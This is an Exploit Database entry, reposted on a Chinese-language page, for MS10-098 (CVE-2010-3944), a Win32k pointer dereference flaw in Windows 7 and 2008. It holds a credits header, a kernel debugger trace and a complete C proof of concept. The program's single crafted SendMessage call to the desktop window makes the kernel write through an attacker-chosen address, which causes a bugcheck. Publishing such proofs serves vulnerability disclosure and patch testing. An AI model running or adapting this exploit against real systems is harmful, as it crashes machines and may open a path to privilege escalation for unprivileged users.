Microsoft Windows – Win32k Pointer Dereferencement (PoC) (MS10-098)

• Exploit Database
• 15 阅读

• 作者： Stefan LE BERRE
  日期： 2010-12-17
• 类别：

  • dos
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/15758/

• /*************************************************************************************
  * MS10-098
  * CVE-2010-3944
  * 
  * Microsoft Windows Win32k pointer dereferencement
  * 
  * --------------------
  * Affected Software
  * ------------------------
  * Microsoft Windows 7 / 2008
  * 
  * 
  * --------------------
  * Consequences
  * -----------------------
  * An unprivileged user may be able to cause a bugcheck, or possibly execute
  * arbitrary code by CSRSS.EXE.
  * 
  * 
  * 
  * Credits : Stefan LE BERRE (s.leberre@sysdream.com)
  * Ludo t0ka7a
  * 
  * WebSites : http://www.sysdream.com/
  *http://ghostsinthestack.org/
  *http://infond.blogspot.com/
  *http://twitter.com/hackinparis
  * 
  * kd> r
  * eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
  * eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc
  * cs=0008ss=0010ds=0023es=0023fs=0030gs=0000 efl=00010286
  * win32k!xxxRealDefWindowProc+0xf6:
  * 8d72af90 c60000mov byte ptr [eax],0 ds:0023:00013370=??
  *
  *************************************************************************************/
  
  #include <stdio.h> 
  #include <windows.h> 
  #include <Winuser.h>
  
  
  int main(int argc, char *argv[]) 
  { 
  SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
  	return 0;
  }